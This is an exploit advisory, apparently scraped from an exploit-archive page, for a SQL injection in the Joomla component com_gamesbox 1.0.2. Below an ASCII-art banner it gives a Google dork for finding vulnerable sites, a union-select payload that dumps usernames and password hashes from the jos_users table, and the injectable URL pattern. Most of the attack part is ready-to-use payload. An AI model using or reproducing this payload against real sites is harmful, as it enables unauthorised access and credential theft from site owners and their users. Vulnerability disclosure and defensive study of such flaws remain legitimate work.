扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 |
) )) ( ( ( (( ) ) ( /(( /( ( ( /(( (( )\ ))\ ))\ ))\ ) )\ ) ( /(( /( )\())\()))\ ))\()) )\)\ )\ (()/(()/(((()/(()/((()/( )\()) )\()) ((_)((_)\(()/( ((_)((((_)((((_)(((_)(/(_))(_)) )\/(_))(_))/(_))(_)\|((_)\ __ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))_((_)_ ((_) \ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ ||_ _|| \| | |/ / \ V / (_) || (_ |\ V / / _ \| (__ / _ \ | /| |) | _|| / |__ | | | .` | ' < |_| \___/\___| |_| /_/ \_\\___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\ .WEB.ID ----------------------------------------------------------------------- Joomla Component com_gamesbox 1.0.2 (id) SQL Injection Vulnerability ----------------------------------------------------------------------- Author : v3n0m Site : http://yogyacarderlink.web.id/ Date : June, 30-2010 Location : Jakarta, Indonesia Time Zone : GMT +7:00 ---------------------------------------------------------------- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Gamesbox Version : 1.0.2 Lower versions may also be affected Vendor : http://www.jooforge.com/ License : GPL Google Dork : inurl:com_gamesbox Description : Gamesbox is the innovative component developed for Joomla™ that allows you to manage a real and unique portal for videogames. ---------------------------------------------------------------- Exploit: ~~~~~~~ -9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5,6,7,8+from+jos_users-- Poc: ~~~~~~~ http://127.0.0.1/[path]/index.php?option=com_gamesbox&view=consoles&layout=console&id=[SQLi] ---------------------------------------------------------------- WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com ---------------------------[EOF]-------------------------------- |
体验盒子
